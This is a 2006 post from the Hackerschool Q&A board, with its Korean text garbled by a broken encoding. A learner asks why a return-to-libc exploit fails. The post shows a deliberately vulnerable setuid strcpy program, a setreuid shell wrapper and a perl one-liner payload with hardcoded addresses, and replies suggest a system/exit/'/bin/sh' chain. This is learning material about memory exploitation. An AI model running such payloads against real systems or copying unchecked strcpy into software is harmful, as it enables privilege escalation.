ý ŷ

 1574, 8/79 ȸ  α  
   randomkid
   ȶ ϴ. е ּ .Ф

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=615 []


ް ÿ÷ο ߿ return into libcκԴϴ.

ϴ ̵ level9 ؼ
ϴ.(ϸ vul.c)
int main(int argc,char *argv[])
{
      char buf[7];
      strcpy(buf,argv[1]);
      return 0;
}
chmod u+s vul ɾϴ.

level11 ؼ
shell.c ۼ߽ϴ.

int main()
{
  setreuid(geteuid(),geteuid());
  setregid(getegid(),getegid());

  execl("/bin/bash","sh",0);
}
execl libcġ ˾Ƴ½ϴ.(0x400d16c0)
׸ gdb vul  ܺ ּҰ ˾Ƴ½ϴ.(0xbffffb34)

׷ ڵ带 ־ϴ.
./vul `perl -e 'print "A"x24,"\x34\xfb\xff\xbf","\xc3\x16\x0d\x40"," ./shell"'`
׷ ׸Ʈ Ʈ ڲ ϴ. .

gdb r `perl -e 'print "A"x24,"\x34\xfb\xff\xbf","\xc3\x16\x0d\x40"," ./shell"'`̷ ְ ϳ Ȯغôµ
ebp 0xbffffb34  巹 κп execl ° Ȯߴµ ȵ˴ϴ. .

̰ 3° ֽϴ. лε ̷ ϱ Դϴ.

α׷ ϳ ϴ.( غýϴ.)

ƹ ص øϴ. Ź帳ϴ.
  Hit : 3374     Date : 2006/09/04 05:30


    
bugfixer2 ׸Ʈ ߽Ŵٸ.. 'A'x24 κ ĺôٺ ? .. ּҰ ȮҰ 2006/09/09  
awsedr45 aX24 system(ּ) exit(ּ) bin/sh(ּ) 2006/09/09  
awsedr45 ƴϸ ps -a ɾ غ bash 2006/09/09  
  ȶ ϴ. е ּ .Ф[3]     randomkid
 09/04 3373
1433   ڵ带 ־ϳ?[4]     morieye
 12/14 2415
1432   ڵ ۼ߿...[1]     yunzjung
 01/30 3410
1431   ̿ ø ÷ ø ˷ּ[3]     rockband
 02/20 7042
1430   ̿ ŷ ûԴϴ...[2]     kpatriot
 11/25 12815
1429   ǽ α ./quiz ̵϶° ?[4]     Gix
 04/07 3281
1428   ǽغ ϴµ ...(ʺ ּ _)[14]     wawer153
 07/09 4400
1427   ǽ os ؼ .... մϴ.[2]     dnjs7292
 03/28 3838
1426   ýۺ ŷå ....[1]     larynx
 03/17 3710
1425   ýŷҶ [3]     thsrhkdwns
 12/05 2163
1424   ýŷ̶ α׷ ŷѴٴ°Ͱ ǰ?[2]     darkofgy
 06/19 3290
1423   ýŷ [1]     uijk
 01/30 2819
1422   ýŷ Ӹ ֳ?[2]     kumi123
 02/07 3277
1421   ý,Ʈũ[1]     rlarhks121
 10/08 3257
1420   ý ǻͷ ͳ      laiqu88
 11/21 3678
1419   ý ٿµ.     imotar
 03/31 3181
1418   ý ޸ Ұ ޸ ϳ?     ocal
 03/30 1710
1417   ý ŷ ؼ ι 帮 ͽϴ.[2]     ahnjungyu
 01/29 3534
1416   ý ŷ 21 ڷ Ź ɱ?     sexissports
 06/23 2412
1415   ý ŷ ϸ ΰ? [2]     ȭ
 11/24 3198
[1][2][3][4][5][6][7] 8 [9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org